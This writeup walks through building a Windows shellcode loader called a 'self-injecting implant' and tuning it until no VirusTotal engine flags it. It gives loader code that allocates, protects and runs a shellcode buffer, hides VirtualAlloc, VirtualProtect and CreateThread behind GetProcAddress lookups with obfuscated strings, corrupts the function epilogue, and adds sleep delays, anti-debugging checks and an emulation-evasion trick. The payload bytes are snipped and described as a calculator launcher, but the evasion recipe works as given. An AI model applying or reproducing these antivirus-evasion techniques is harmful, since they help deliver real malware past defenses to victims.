
ZeroTotal: Self-Injecting Calc

The quest to achieve an undetected self-injecting calc implant

Part One: Introduction

In this writeup, we're going to take our previous work to its next logical step: building our custom calc payload into a self-injecting implant. The goal, once again, is to get zero hits on VirusTotal.

Part Two: Getting Started

We begin with this code template.

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void) {
    
	void * exec_mem;
	BOOL rv;
	HANDLE th;
           DWORD oldprotect = 0;
	
	//custom calc payload
	unsigned char payload[] = { 0x90, 0x48, […snip…]0xff 0x0 };
	unsigned int payload_len = sizeof(payload);
	
	// Allocate a memory buffer for payload
	exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

	// Copy payload to program memory
	RtlMoveMemory(exec_mem, payload, payload_len);
	
	// Make payload executable
	rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);

	printf("\nLaunch Payload?\n");
	getchar();

	// Run payload
	if ( rv != 0 ) {
			th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
			WaitForSingleObject(th, -1);
	}

	return 0;
}

If we compile and run the code above, we see that it works.

Part Three: Cruising with the compiler

Let's compile this code and test it against VirusTotal.

It's here that my experiments showed something interesting. If we compile implant.exe with /MD instead of /MT, we only get 5 hits on VirusTotal. /MD links the C runtime dynamically, while /MT links it statically, which is the standard malware approach.

Another benefit is that we end up with a 12 KB payload instead of a 142 KB one.

Obviously, the import address tables will differ between the two builds. If a target does not have all the required DLLs (such as the matching Visual C++ runtime) available to our implant, execution will fail. But since our goal is to beat VirusTotal, we can continue with our dynamically linked payload.

Implant_static.exe:

Implant_dynamic.exe:

There are a couple of approaches we can take now. We can either apply some programmatic, source-level solutions, or do as we did previously and modify the executable at the assembly level. We'll explore both.

Part Four: Let's get down to business

Now that we've settled on an approach and on the version of the executable we want to modify, let's open it up in Binary Ninja and do a little reversing.

We go to our main function (you'll have to find it yourself; the names are stripped from the binary) and start poking around.

We're going to try something a little interesting here. Every function in assembly has an epilogue, which is where the function tears down its stack frame and prepares to return to its caller. Because main does everything we need before it reaches the epilogue, an easy way to break a lot of static analysis is to corrupt that epilogue. Let's try it and see how it goes.

Original epilogue:

New epilogue:

And our program still works.

We're down to the final three on VirusTotal!

Let's take a look at the Windows x64 calling convention.

The registers in the scratch (volatile) column, namely rax, rcx, rdx, r8, r9, r10, and r11, are free to be clobbered across function calls. Clobbering them on purpose should break up our signature even further and maybe get us down to zero.

Ideally, we want to break apart how functions get called. If we deviate from the standard function-calling mechanics, automated static analysis will have a hard time understanding what's actually happening in our program.

Part Five: Defeating the Huns

After a while of byte-level manipulation, I got stuck at three. Honestly, at this level there's no real way around static analysis checking my imports.

Those calls to CreateThread, VirtualAlloc, and VirtualProtect are probably what's getting us in trouble. Let's use some WinAPI function pointers to get around that.

Of note, you won't see RtlMoveMemory listed in the imports, because the compiler inlined that part of the code.

Now our code looks a little more complicated, but here it is:

#include <windows.h>
#include <stdio.h>
#include <time.h>


unsigned char sVirtualProtect[] = { 'V','i','r','t','u','a','l','P','r','o','t','e','c','t', 0x0 };
unsigned char sVirtualAlloc[] = {'V','i','r','t','u','a','l','A','l','l','o','c',0x0};

typedef LPVOID (WINAPI * VirtualAlloc_t)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
typedef BOOL (WINAPI * VirtualProtect_t)(LPVOID, SIZE_T, DWORD, PDWORD);

int __cdecl main(VOID) {
    
	void * exec_mem;
	BOOL rv;
	HANDLE th;
    DWORD oldprotect = 0;
	
	//function pointers
	VirtualAlloc_t VirtualAlloc_p = (VirtualAlloc_t) GetProcAddress(GetModuleHandle((LPCSTR) "kErnEl32.DLl"), (LPCSTR) sVirtualAlloc);
	VirtualProtect_t VirtualProtect_p = (VirtualProtect_t) GetProcAddress(GetModuleHandle((LPCSTR) "kErnEl32.DLl"), (LPCSTR) sVirtualProtect);
	
	//custom calc payload
	unsigned char payload[] = { […snip…] };
	unsigned int payload_len = sizeof(payload);
	
	// Allocate a memory buffer for payload
	exec_mem = VirtualAlloc_p(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

	// Copy payload to program memory ; this gets inlined
	RtlMoveMemory(exec_mem, payload, payload_len);
	
	// Make payload executable
	rv = VirtualProtect_p(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);

	printf("\nLaunch Payload?\n");
	getchar();

	// Run payload
	if ( rv != 0 ) {
			th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
			WaitForSingleObject(th, INFINITE);
	}

	return 0;
}

If we compile it and look at the imports in PE-bear, we notice that VirtualProtect and VirtualAlloc are missing. Perfect! Let's break the main function epilogue and see how we do now.

If you're paying attention as you clobber the main() epilogue, you'll notice that the direct calls to the VirtualProtect and VirtualAlloc imports are gone, which is exactly what we want.

Let's opt for the lazy NOP and see where that gets us on VirusTotal.

And then there were two:

Looking at the VirusTotal results, several providers timed out. The scan took about 90 seconds, so let's see if we can force more of them to time out by simply making our program wait at runtime.

So this time we're going to do three things:

  • Remove CreateThread() by using an API function pointer like we did for VirtualAlloc/VirtualProtect

  • Destroy the epilogue of our main() function

  • Add a ten second sleep to try to force more AV engines to time out on VirusTotal

Looks like we're still stuck at two.

Using ThreatCheck, we get a hint of what's wrong.

Our file is failing emulation checks! We have to figure out a way past those checks. Let's apply some anti-debugging techniques.

Part Six: The force of a great typhoon

We implement a couple of techniques, and it looks like we might be good!

BOOL  bDebuggerPresent;
CheckRemoteDebuggerPresent(GetCurrentProcess(), &bDebuggerPresent);
__analysis_noreturn int FatalExit(1);
DebugActiveProcessStop(GetCurrentProcessId());
if (!(IsDebuggerPresent() || bDebuggerPresent)){[…snip…]

And then there was one...

There's one more anti-debugging trick worth a try. Honestly, at this point we can abandon the lower-level executable manipulations. They worked against some intermediate-level detection algorithms, but the debugging checks get us past those without having to clobber the main() epilogue.

Let's add this check and see if we can get to 0:

int i = 1000000;
int n = 0;
char * buffer;
buffer = (char*) malloc (i+1);

for (n=0; n<i; n++)
  buffer[n]=rand()%26+'a';
buffer[i]='\0';

if (buffer==NULL) 
	exit (1);
	
free (buffer);

Part Seven: ???

[Intentionally left blank]

Part Eight: Profit

A second attempt confirms that we can also drop the long sleep() when deploying our payload!

After a little bit more tweaking to our code for readability, we succeed once more!

Part Nine: Conclusion

In this writeup, we saw the effects that various techniques have on our implant's detectability and functionality. Low-level opcode manipulations gave us an advantage over some forms of static analysis, but the payoff-to-work ratio made programmatic manipulations more worthwhile. We also saw that sleep manipulation was not particularly effective in this case.

Additionally, it's important to note that we spent most of our time working with a dynamically linked payload. As a result, there will be limits on the types of targets that this specific set of methods will work against.

Ultimately, we were able to overcome a significant detection challenge quickly and rather simply, using WinAPI function pointers and some basic debugging checks. Next time, we'll use this as a jumping-off point as we work toward a 0-total for a statically linked implant.
